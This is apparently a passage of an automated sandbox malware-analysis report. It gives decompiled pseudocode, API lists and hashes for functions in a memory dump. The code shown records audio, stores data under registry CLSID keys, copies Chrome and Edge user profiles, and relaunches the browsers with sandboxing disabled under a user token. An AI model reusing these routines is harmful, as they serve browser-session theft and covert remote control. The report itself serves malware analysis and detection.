						TranslateMessage( &_v32);
						DispatchMessageW( &_v32);
					} while (GetMessageW( &_v32, 0, 0, 0) != 0);
					goto L7;
				}
				L9:
			}







                                                                                    0x04eb156d
                                                                                    0x04eb15e8
                                                                                    0x04eb15ee
                                                                                    0x04eb156f
                                                                                    0x04eb156f
                                                                                    0x04eb1580
                                                                                    0x04eb1580
                                                                                    0x04eb1588
                                                                                    0x04eb15bf
                                                                                    0x04eb15c4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb158a
                                                                                    0x04eb158d
                                                                                    0x04eb1598
                                                                                    0x04eb15a8
                                                                                    0x04eb15b2
                                                                                    0x04eb15ba
                                                                                    0x04eb15fa
                                                                                    0x04eb15bc
                                                                                    0x04eb15bc
                                                                                    0x00000000
                                                                                    0x04eb15bc
                                                                                    0x04eb15ba
                                                                                    0x00000000
                                                                                    0x04eb15c6
                                                                                    0x04eb15ca
                                                                                    0x04eb15d0
                                                                                    0x04eb15e2
                                                                                    0x00000000
                                                                                    0x04eb1580
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 04EB1569
                                                                                    • SetEvent.KERNEL32(?), ref: 04EB158D
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04EB1598
                                                                                    • waveInAddBuffer.WINMM(?,?,00000020), ref: 04EB15B2
                                                                                    • TranslateMessage.USER32(?), ref: 04EB15CA
                                                                                    • DispatchMessageW.USER32 ref: 04EB15D0
                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 04EB15E0
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Message$BufferDispatchEventObjectSingleTranslateWaitwave
                                                                                    • String ID:
                                                                                    • API String ID: 3294988761-0
                                                                                    • Opcode ID: 5b5c4125e17d769400d052014331a647dc8cea0895c88373b16ec9d49ea8f09a
                                                                                    • Instruction ID: 4c52cfab57da92d1a6f6b224a658f9d1c92780b9e60160d3970d6971dde9ccc1
                                                                                    • Opcode Fuzzy Hash: 5b5c4125e17d769400d052014331a647dc8cea0895c88373b16ec9d49ea8f09a
                                                                                    • Instruction Fuzzy Hash: 4A11B232A00309AFDB219EAAEC45FABB7B8EB44761F004625FA51D61D4D725F8018BA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC7C50, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 94%
                                                                                    			E04EC7C50(void* __ecx, signed char* _a4) {
				void* _t22;
				intOrPtr _t23;
				void* _t28;
				intOrPtr* _t31;
				intOrPtr _t32;

				_t28 = __ecx;
				_t22 = ( *_a4 & 0x000000ff) + 0xffffffe1;
				if(_t22 > 0x5c) {
					L7:
					_t23 =  *((intOrPtr*)(_t28 + 4));
					_t31 =  *((intOrPtr*)(_t23 + 0x20));
					 *(_t23 + 0x44) = 1;
					if(_t31 != 0) {
						L10:
						return  *((intOrPtr*)( *_t31 + 4))();
					}
					_t32 =  *((intOrPtr*)(_t23 + 0x24));
					if(_t32 != 0) {
						_t31 = _t32 + 4;
						goto L10;
					}
					return _t23;
				} else {
					switch( *((intOrPtr*)(( *(_t22 + 0x4ec7d30) & 0x000000ff) * 4 +  &M04EC7D18))) {
						case 0:
							__eax = __ebx + 0xec;
							__eax = InterlockedExchange(__ebx + 0xec, 1);
							 *((intOrPtr*)(__ebx + 0xe8)) = 0x3f;
							return __eax;
							goto L12;
						case 1:
							__eax = __ebx + 0xec;
							__eax = InterlockedExchange(__ebx + 0xec, 0);
							 *((intOrPtr*)(__ebx + 0xe8)) = 0x1f;
							return __eax;
							goto L12;
						case 2:
							_push(__edi);
							__edi =  *(__ecx + 5);
							__ebx + 0x10 = InterlockedExchange(__ebx + 0x10,  *(__ecx + 1));
							__eax = __ebx + 0x14;
							__eax = InterlockedExchange(__ebx + 0x14, __edi);
							_pop(__edi);
							return __eax;
							goto L12;
						case 3:
							__eax =  *(__ecx + 1);
							 *(__ebx + 0xf4) = __eax;
							return __eax;
							goto L12;
						case 4:
							return SetEvent( *(__ecx + 0x18));
							goto L12;
						case 5:
							goto L7;
					}
				}
				L12:
			}








                                                                                    0x04ec7c54
                                                                                    0x04ec7c5c
                                                                                    0x04ec7c62
                                                                                    0x04ec7cf0
                                                                                    0x04ec7cf0
                                                                                    0x04ec7cf3
                                                                                    0x04ec7cf6
                                                                                    0x04ec7cff
                                                                                    0x04ec7d0b
                                                                                    0x00000000
                                                                                    0x04ec7d0d
                                                                                    0x04ec7d01
                                                                                    0x04ec7d06
                                                                                    0x04ec7d08
                                                                                    0x00000000
                                                                                    0x04ec7d08
                                                                                    0x04ec7d12
                                                                                    0x04ec7c68
                                                                                    0x04ec7c6f
                                                                                    0x00000000
                                                                                    0x04ec7ca8
                                                                                    0x04ec7caf
                                                                                    0x04ec7cb5
                                                                                    0x04ec7cc1
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec7cc6
                                                                                    0x04ec7ccd
                                                                                    0x04ec7cd3
                                                                                    0x04ec7cdf
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec7c84
                                                                                    0x04ec7c88
                                                                                    0x04ec7c8f
                                                                                    0x04ec7c96
                                                                                    0x04ec7c9a
                                                                                    0x04ec7ca0
                                                                                    0x04ec7ca3
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec7ce2
                                                                                    0x04ec7ce5
                                                                                    0x04ec7ced
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec7c81
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec7c6f
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • SetEvent.KERNEL32(?), ref: 04EC7C79
                                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 04EC7C8F
                                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 04EC7C9A
                                                                                    • InterlockedExchange.KERNEL32(?,00000001), ref: 04EC7CAF
                                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 04EC7CCD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExchangeInterlocked$Event
                                                                                    • String ID: ?
                                                                                    • API String ID: 767157976-1684325040
                                                                                    • Opcode ID: 56d22b5b29b99a8d8b405215c872b2d75d0466d892857e5bb988b991bb32ecf7
                                                                                    • Instruction ID: 776a4ae6828e0f70d9c36844606fa8bfd6a46bb70dfe3250e94e31dc841cc8dd
                                                                                    • Opcode Fuzzy Hash: 56d22b5b29b99a8d8b405215c872b2d75d0466d892857e5bb988b991bb32ecf7
                                                                                    • Instruction Fuzzy Hash: A5216D72104105DFDB04CF51E988FA6BBA8EB99319F1485ABFE0A8F246C737D451DB20
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EEBE46, Relevance: 10.6, APIs: 7, Instructions: 65COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E04EEBE46(intOrPtr _a4) {
				void* _t18;
				intOrPtr _t45;

				_t45 = _a4;
				if(_t45 != 0) {
					E04EEBE0A(_t45, 7);
					_t2 = _t45 + 0x1c; // 0x1d
					E04EEBE0A(_t2, 7);
					_t3 = _t45 + 0x38; // 0x39
					E04EEBE0A(_t3, 0xc);
					_t4 = _t45 + 0x68; // 0x69
					E04EEBE0A(_t4, 0xc);
					_t5 = _t45 + 0x98; // 0x99
					E04EEBE0A(_t5, 2);
					E04EE8159( *((intOrPtr*)(_t45 + 0xa0)));
					E04EE8159( *((intOrPtr*)(_t45 + 0xa4)));
					E04EE8159( *((intOrPtr*)(_t45 + 0xa8)));
					_t9 = _t45 + 0xb4; // 0xb5
					E04EEBE0A(_t9, 7);
					_t10 = _t45 + 0xd0; // 0xd1
					E04EEBE0A(_t10, 7);
					_t11 = _t45 + 0xec; // 0xed
					E04EEBE0A(_t11, 0xc);
					_t12 = _t45 + 0x11c; // 0x11d
					E04EEBE0A(_t12, 0xc);
					_t13 = _t45 + 0x14c; // 0x14d
					E04EEBE0A(_t13, 2);
					E04EE8159( *((intOrPtr*)(_t45 + 0x154)));
					E04EE8159( *((intOrPtr*)(_t45 + 0x158)));
					E04EE8159( *((intOrPtr*)(_t45 + 0x15c)));
					return E04EE8159( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}





                                                                                    0x04eebe4c
                                                                                    0x04eebe51
                                                                                    0x04eebe5a
                                                                                    0x04eebe5f
                                                                                    0x04eebe65
                                                                                    0x04eebe6a
                                                                                    0x04eebe70
                                                                                    0x04eebe75
                                                                                    0x04eebe7b
                                                                                    0x04eebe80
                                                                                    0x04eebe89
                                                                                    0x04eebe94
                                                                                    0x04eebe9f
                                                                                    0x04eebeaa
                                                                                    0x04eebeaf
                                                                                    0x04eebeb8
                                                                                    0x04eebebd
                                                                                    0x04eebec6
                                                                                    0x04eebece
                                                                                    0x04eebed7
                                                                                    0x04eebedc
                                                                                    0x04eebee5
                                                                                    0x04eebeea
                                                                                    0x04eebef3
                                                                                    0x04eebefe
                                                                                    0x04eebf09
                                                                                    0x04eebf14
                                                                                    0x00000000
                                                                                    0x04eebf24
                                                                                    0x04eebf29

                                                                                    APIs
                                                                                      • Part of subcall function 04EEBE0A: _free.LIBCMT ref: 04EEBE33
                                                                                    • _free.LIBCMT ref: 04EEBE94
                                                                                      • Part of subcall function 04EE8159: HeapFree.KERNEL32(00000000,00000000,?,04EE0EDA,00000001,00000001), ref: 04EE816F
                                                                                      • Part of subcall function 04EE8159: GetLastError.KERNEL32(3D21FB31,?,04EE0EDA,00000001,00000001), ref: 04EE8181
                                                                                    • _free.LIBCMT ref: 04EEBE9F
                                                                                    • _free.LIBCMT ref: 04EEBEAA
                                                                                    • _free.LIBCMT ref: 04EEBEFE
                                                                                    • _free.LIBCMT ref: 04EEBF09
                                                                                    • _free.LIBCMT ref: 04EEBF14
                                                                                    • _free.LIBCMT ref: 04EEBF1F
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: 76209f5d8c7b1e7ff31482e428a2cdb4c291a6582c172a885daab1959a0a5aa6
                                                                                    • Instruction ID: ad0aa9724265031930d7411cec6fba80fda83e6d0e59f091372737574fa9d64a
                                                                                    • Opcode Fuzzy Hash: 76209f5d8c7b1e7ff31482e428a2cdb4c291a6582c172a885daab1959a0a5aa6
                                                                                    • Instruction Fuzzy Hash: BB112E72D40B0CAEE620FBB2CC45FEB779CAF04704F406D15A79ABA1A0DA75B50487E1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EBA080, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 64registryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 95%
                                                                                    			E04EBA080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v88;
				short _v608;
				void* _v612;
				signed int _t14;
				intOrPtr* _t16;
				int _t26;
				intOrPtr _t32;
				void* _t37;
				int _t41;
				char* _t43;
				signed int _t44;

				_t14 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t14 ^ _t44;
				_t43 = __ecx;
				_t16 = __ecx;
				_t37 = __ecx + 2;
				do {
					_t32 =  *_t16;
					_t16 = _t16 + 2;
				} while (_t32 != 0);
				_t41 = 2 + (_t16 - _t37 >> 1) * 2;
				E04EC5490(__ecx, _t41);
				E04EC6010(__ebx, L"Global",  &_v88, _t41, __ecx);
				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
				_v612 = 0;
				_t26 = RegCreateKeyExW(0x80000002,  &_v608, 0, 0, 0, 0xf013f, 0,  &_v612, 0);
				if(_t26 == 0) {
					RegSetValueExW(_v612, "3", _t26, 3, _t43, _t41);
					RegCloseKey(_v612);
				}
				return E04ED572E(_v8 ^ _t44);
			}















                                                                                    0x04eba089
                                                                                    0x04eba090
                                                                                    0x04eba094
                                                                                    0x04eba096
                                                                                    0x04eba099
                                                                                    0x04eba0a0
                                                                                    0x04eba0a0
                                                                                    0x04eba0a3
                                                                                    0x04eba0a6
                                                                                    0x04eba0b1
                                                                                    0x04eba0ba
                                                                                    0x04eba0c7
                                                                                    0x04eba0dc
                                                                                    0x04eba0e5
                                                                                    0x04eba111
                                                                                    0x04eba119
                                                                                    0x04eba12b
                                                                                    0x04eba137
                                                                                    0x04eba137
                                                                                    0x04eba14c

                                                                                    APIs
                                                                                    • wsprintfW.USER32 ref: 04EBA0DC
                                                                                    • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,000F013F,00000000,00000000,00000000), ref: 04EBA111
                                                                                    • RegSetValueExW.ADVAPI32(00000000,04EFD120,00000000,00000003), ref: 04EBA12B
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 04EBA137
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseCreateValuewsprintf
                                                                                    • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                                                    • API String ID: 4211343355-1865207932
                                                                                    • Opcode ID: fd4202cee0fd781a7212d1d1b1f467f423c3ad3b425515dc45a7cc432a0ed332
                                                                                    • Instruction ID: b00ed5fe8f19c7b3b1910dcb82f42908a1276e27a69f7b9c6f2376762dd83402
                                                                                    • Opcode Fuzzy Hash: fd4202cee0fd781a7212d1d1b1f467f423c3ad3b425515dc45a7cc432a0ed332
                                                                                    • Instruction Fuzzy Hash: 15116031600218BBEB209F94EC4AFAEB7BCEB84705F104195FE0AE7184DB756E04DB95
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EBA150, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63registryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 95%
                                                                                    			E04EBA150(void* __ebx, char* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v88;
				short _v608;
				void* _v612;
				signed int _t14;
				char* _t20;
				int _t26;
				char _t33;
				char* _t38;
				int _t41;
				char* _t43;
				signed int _t44;

				_t14 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t14 ^ _t44;
				_t43 = __ecx;
				E04EC6010(__ebx, L"Global",  &_v88, __edi, __ecx);
				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
				_t20 = _t43;
				_t38 =  &(_t20[2]);
				do {
					_t33 =  *_t20;
					_t20 =  &(_t20[2]);
				} while (_t33 != 0);
				_t41 = 2 + (_t20 - _t38 >> 1) * 2;
				E04EC5490(_t43, _t41);
				_v612 = 0;
				_t26 = RegCreateKeyExW(0x80000002,  &_v608, 0, 0, 0, 0xf013f, 0,  &_v612, 0);
				if(_t26 == 0) {
					RegSetValueExW(_v612, "2", _t26, 3, _t43, _t41);
					RegCloseKey(_v612);
				}
				return E04ED572E(_v8 ^ _t44);
			}















                                                                                    0x04eba159
                                                                                    0x04eba160
                                                                                    0x04eba164
                                                                                    0x04eba16f
                                                                                    0x04eba184
                                                                                    0x04eba18a
                                                                                    0x04eba18f
                                                                                    0x04eba192
                                                                                    0x04eba192
                                                                                    0x04eba195
                                                                                    0x04eba198
                                                                                    0x04eba1a3
                                                                                    0x04eba1ac
                                                                                    0x04eba1b9
                                                                                    0x04eba1dd
                                                                                    0x04eba1e5
                                                                                    0x04eba1f7
                                                                                    0x04eba203
                                                                                    0x04eba203
                                                                                    0x04eba218

                                                                                    APIs
                                                                                      • Part of subcall function 04EC6010: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,00000378), ref: 04EC61B1
                                                                                      • Part of subcall function 04EC6010: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 04EC61DF
                                                                                      • Part of subcall function 04EC6010: RegCloseKey.ADVAPI32(?), ref: 04EC61F5
                                                                                    • wsprintfW.USER32 ref: 04EBA184
                                                                                    • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,000F013F,00000000,?,00000000), ref: 04EBA1DD
                                                                                    • RegSetValueExW.ADVAPI32(00000000,04EFD124,00000000,00000003), ref: 04EBA1F7
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 04EBA203
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseValue$CreateOpenQuerywsprintf
                                                                                    • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                                                    • API String ID: 73588525-1865207932
                                                                                    • Opcode ID: 14d47ba13d02af0db5b94a3c004936483b77b2a8aa0a5b76ecdbae557a88f1c1
                                                                                    • Instruction ID: 7d5de9f921037ef46ef4bc54ea20e1c9b1f4c3d61727044eafef904ef2bc2b12
                                                                                    • Opcode Fuzzy Hash: 14d47ba13d02af0db5b94a3c004936483b77b2a8aa0a5b76ecdbae557a88f1c1
                                                                                    • Instruction Fuzzy Hash: 3D116031A00218BBEB20DB95DC4AFAE7779EB84705F104195AE06E7184EAB56E04DB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB6870, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 61stringCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 57%
                                                                                    			E04EB6870(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _v12;
				short _v536;
				short _v1056;
				char _v1060;
				char _v1076;
				signed int _t18;
				void* _t20;
				void* _t48;
				signed int _t50;

				_t18 =  *0x4f03008; // 0x3d21fb31
				_v12 = _t18 ^ _t50;
				_t48 = __ecx;
				_v1060 = 0x104;
				_t20 = E04EC7200( &_v536,  &_v1060, __eflags);
				_t56 = _t20;
				if(_t20 == 0) {
					__eflags = _v12 ^ _t50;
					return E04ED572E(_v12 ^ _t50);
				} else {
					lstrcatW( &_v536, L"\\AppData\\Local\\Google\\Chrome\\User Data");
					wsprintfW( &_v1056, L"%s%s",  &_v536,  *((intOrPtr*)(_t48 + 0x70)));
					E04EC7390(__ebx,  &_v536,  &_v1056, _t48, __esi);
					wsprintfW( &_v536, L"cmd.exe /c start chrome.exe --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir=\"%s\"",  &_v1056);
					asm("xorps xmm0, xmm0");
					asm("movups [ebp-0x430], xmm0");
					_push( &_v1076);
					_push( &_v536);
					E04EC72A0(__ebx,  *((intOrPtr*)(_t48 + 0x70)), _t56);
					return E04ED572E(_v12 ^ _t50,  &_v536);
				}
			}












                                                                                    0x04eb6879
                                                                                    0x04eb6880
                                                                                    0x04eb6884
                                                                                    0x04eb6886
                                                                                    0x04eb689c
                                                                                    0x04eb68a1
                                                                                    0x04eb68a3
                                                                                    0x04eb6941
                                                                                    0x04eb694c
                                                                                    0x04eb68a9
                                                                                    0x04eb68b5
                                                                                    0x04eb68d1
                                                                                    0x04eb68e3
                                                                                    0x04eb68fb
                                                                                    0x04eb690d
                                                                                    0x04eb6910
                                                                                    0x04eb6917
                                                                                    0x04eb6921
                                                                                    0x04eb6923
                                                                                    0x04eb6939
                                                                                    0x04eb6939

                                                                                    APIs
                                                                                      • Part of subcall function 04EC7200: LoadLibraryA.KERNEL32(Wtsapi32.dll,?,?,?,04EB68A1), ref: 04EC7229
                                                                                      • Part of subcall function 04EC7200: GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 04EC7239
                                                                                      • Part of subcall function 04EC7200: GetUserProfileDirectoryW.USERENV(?,?,00000104,?,?,?,04EB68A1), ref: 04EC7255
                                                                                      • Part of subcall function 04EC7200: CloseHandle.KERNEL32(?,?,?,?,04EB68A1), ref: 04EC7260
                                                                                    • lstrcatW.KERNEL32(?,\AppData\Local\Google\Chrome\User Data), ref: 04EB68B5
                                                                                    • wsprintfW.USER32 ref: 04EB68D1
                                                                                      • Part of subcall function 04EC7390: lstrcpyW.KERNEL32 ref: 04EC73D4
                                                                                      • Part of subcall function 04EC7390: lstrcatW.KERNEL32(?,04EFE170), ref: 04EC73EC
                                                                                      • Part of subcall function 04EC7390: CreateDirectoryW.KERNEL32(?,00000000), ref: 04EC73F1
                                                                                      • Part of subcall function 04EC7390: GetLastError.KERNEL32 ref: 04EC7401
                                                                                      • Part of subcall function 04EC7390: FindFirstFileW.KERNEL32(?,?), ref: 04EC741C
                                                                                      • Part of subcall function 04EC7390: lstrcpyW.KERNEL32 ref: 04EC7463
                                                                                      • Part of subcall function 04EC7390: lstrcatW.KERNEL32(?,04EFC92C), ref: 04EC7475
                                                                                      • Part of subcall function 04EC7390: lstrcatW.KERNEL32(?,?), ref: 04EC7485
                                                                                      • Part of subcall function 04EC7390: lstrcpyW.KERNEL32 ref: 04EC74AA
                                                                                      • Part of subcall function 04EC7390: lstrcatW.KERNEL32(?,04EFC92C), ref: 04EC74BC
                                                                                      • Part of subcall function 04EC7390: lstrcatW.KERNEL32(?,?), ref: 04EC74CC
                                                                                      • Part of subcall function 04EC7390: lstrcmpW.KERNEL32(?,04EFC940), ref: 04EC74E3
                                                                                      • Part of subcall function 04EC7390: lstrcmpW.KERNEL32(?,04EFC944), ref: 04EC74F5
                                                                                    • wsprintfW.USER32 ref: 04EB68FB
                                                                                      • Part of subcall function 04EC72A0: LoadLibraryA.KERNEL32(Wtsapi32.dll), ref: 04EC72E9
                                                                                      • Part of subcall function 04EC72A0: GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 04EC72F9
                                                                                      • Part of subcall function 04EC72A0: CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 04EC7316
                                                                                      • Part of subcall function 04EC72A0: CreateProcessAsUserW.ADVAPI32(?,00000000,04EB6928,00000000,00000000,00000000,00000400,?,00000000,00000044,?), ref: 04EC7346
                                                                                      • Part of subcall function 04EC72A0: DestroyEnvironmentBlock.USERENV(?), ref: 04EC7354
                                                                                    Strings
                                                                                    • \AppData\Local\Google\Chrome\User Data, xrefs: 04EB68A9
                                                                                    • %s%s, xrefs: 04EB68CB
                                                                                    • cmd.exe /c start chrome.exe --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir="%, xrefs: 04EB68F5
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$Createlstrcpy$AddressBlockDirectoryEnvironmentLibraryLoadProcUserlstrcmpwsprintf$CloseDestroyErrorFileFindFirstHandleLastProcessProfile
                                                                                    • String ID: %s%s$\AppData\Local\Google\Chrome\User Data$cmd.exe /c start chrome.exe --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir="%
                                                                                    • API String ID: 354288507-1696747008
                                                                                    • Opcode ID: 937e6c7fd26231149c4ffe24525015f9217defe955e244b9d2eeb15d009cf430
                                                                                    • Instruction ID: 04d699aa2c73d075a7600813da649d90d560bf64861eb1ddcec9b9e96cc29838
                                                                                    • Opcode Fuzzy Hash: 937e6c7fd26231149c4ffe24525015f9217defe955e244b9d2eeb15d009cf430
                                                                                    • Instruction Fuzzy Hash: F72196B1E4010EA7CB24EF64DD449DEB3BCFF54304F4051E6A90993040EB30AA99CFA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB6950, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 61stringCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 57%
                                                                                    			E04EB6950(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _v12;
				short _v536;
				short _v1056;
				char _v1060;
				char _v1076;
				signed int _t18;
				void* _t20;
				void* _t48;
				signed int _t50;

				_t18 =  *0x4f03008; // 0x3d21fb31
				_v12 = _t18 ^ _t50;
				_t48 = __ecx;
				_v1060 = 0x104;
				_t20 = E04EC7200( &_v536,  &_v1060, __eflags);
				_t56 = _t20;
				if(_t20 == 0) {
					__eflags = _v12 ^ _t50;
					return E04ED572E(_v12 ^ _t50);
				} else {
					lstrcatW( &_v536, L"\\AppData\\Local\\Microsoft\\Edge\\User Data");
					wsprintfW( &_v1056, L"%s%s",  &_v536,  *((intOrPtr*)(_t48 + 0x70)));
					E04EC7390(__ebx,  &_v536,  &_v1056, _t48, __esi);
					wsprintfW( &_v536, L"cmd.exe /c start msedge.exe --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir=\"%s\"",  &_v1056);
					asm("xorps xmm0, xmm0");
					asm("movups [ebp-0x430], xmm0");
					_push( &_v1076);
					_push( &_v536);
					E04EC72A0(__ebx,  *((intOrPtr*)(_t48 + 0x70)), _t56);
					return E04ED572E(_v12 ^ _t50,  &_v536);
				}
			}












                                                                                    0x04eb6959
                                                                                    0x04eb6960
                                                                                    0x04eb6964
                                                                                    0x04eb6966
                                                                                    0x04eb697c
                                                                                    0x04eb6981
                                                                                    0x04eb6983
                                                                                    0x04eb6a21
                                                                                    0x04eb6a2c
                                                                                    0x04eb6989
                                                                                    0x04eb6995
                                                                                    0x04eb69b1
                                                                                    0x04eb69c3
                                                                                    0x04eb69db
                                                                                    0x04eb69ed
                                                                                    0x04eb69f0
                                                                                    0x04eb69f7
                                                                                    0x04eb6a01
                                                                                    0x04eb6a03
                                                                                    0x04eb6a19
                                                                                    0x04eb6a19

                                                                                    APIs
                                                                                      • Part of subcall function 04EC7200: LoadLibraryA.KERNEL32(Wtsapi32.dll,?,?,?,04EB68A1), ref: 04EC7229
                                                                                      • Part of subcall function 04EC7200: GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 04EC7239
                                                                                      • Part of subcall function 04EC7200: GetUserProfileDirectoryW.USERENV(?,?,00000104,?,?,?,04EB68A1), ref: 04EC7255
                                                                                      • Part of subcall function 04EC7200: CloseHandle.KERNEL32(?,?,?,?,04EB68A1), ref: 04EC7260
                                                                                    • lstrcatW.KERNEL32(?,\AppData\Local\Microsoft\Edge\User Data), ref: 04EB6995
                                                                                    • wsprintfW.USER32 ref: 04EB69B1
                                                                                      • Part of subcall function 04EC7390: lstrcpyW.KERNEL32 ref: 04EC73D4
                                                                                      • Part of subcall function 04EC7390: lstrcatW.KERNEL32(?,04EFE170), ref: 04EC73EC
                                                                                      • Part of subcall function 04EC7390: CreateDirectoryW.KERNEL32(?,00000000), ref: 04EC73F1
                                                                                      • Part of subcall function 04EC7390: GetLastError.KERNEL32 ref: 04EC7401
                                                                                      • Part of subcall function 04EC7390: FindFirstFileW.KERNEL32(?,?), ref: 04EC741C
                                                                                      • Part of subcall function 04EC7390: lstrcpyW.KERNEL32 ref: 04EC7463
                                                                                      • Part of subcall function 04EC7390: lstrcatW.KERNEL32(?,04EFC92C), ref: 04EC7475
                                                                                      • Part of subcall function 04EC7390: lstrcatW.KERNEL32(?,?), ref: 04EC7485
                                                                                      • Part of subcall function 04EC7390: lstrcpyW.KERNEL32 ref: 04EC74AA
                                                                                      • Part of subcall function 04EC7390: lstrcatW.KERNEL32(?,04EFC92C), ref: 04EC74BC
                                                                                      • Part of subcall function 04EC7390: lstrcatW.KERNEL32(?,?), ref: 04EC74CC
                                                                                      • Part of subcall function 04EC7390: lstrcmpW.KERNEL32(?,04EFC940), ref: 04EC74E3
                                                                                      • Part of subcall function 04EC7390: lstrcmpW.KERNEL32(?,04EFC944), ref: 04EC74F5
                                                                                    • wsprintfW.USER32 ref: 04EB69DB
                                                                                      • Part of subcall function 04EC72A0: LoadLibraryA.KERNEL32(Wtsapi32.dll), ref: 04EC72E9
                                                                                      • Part of subcall function 04EC72A0: GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 04EC72F9
                                                                                      • Part of subcall function 04EC72A0: CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 04EC7316
                                                                                      • Part of subcall function 04EC72A0: CreateProcessAsUserW.ADVAPI32(?,00000000,04EB6928,00000000,00000000,00000000,00000400,?,00000000,00000044,?), ref: 04EC7346
                                                                                      • Part of subcall function 04EC72A0: DestroyEnvironmentBlock.USERENV(?), ref: 04EC7354
                                                                                    Strings
                                                                                    • %s%s, xrefs: 04EB69AB
                                                                                    • cmd.exe /c start msedge.exe --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir="%, xrefs: 04EB69D5
                                                                                    • \AppData\Local\Microsoft\Edge\User Data, xrefs: 04EB6989
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
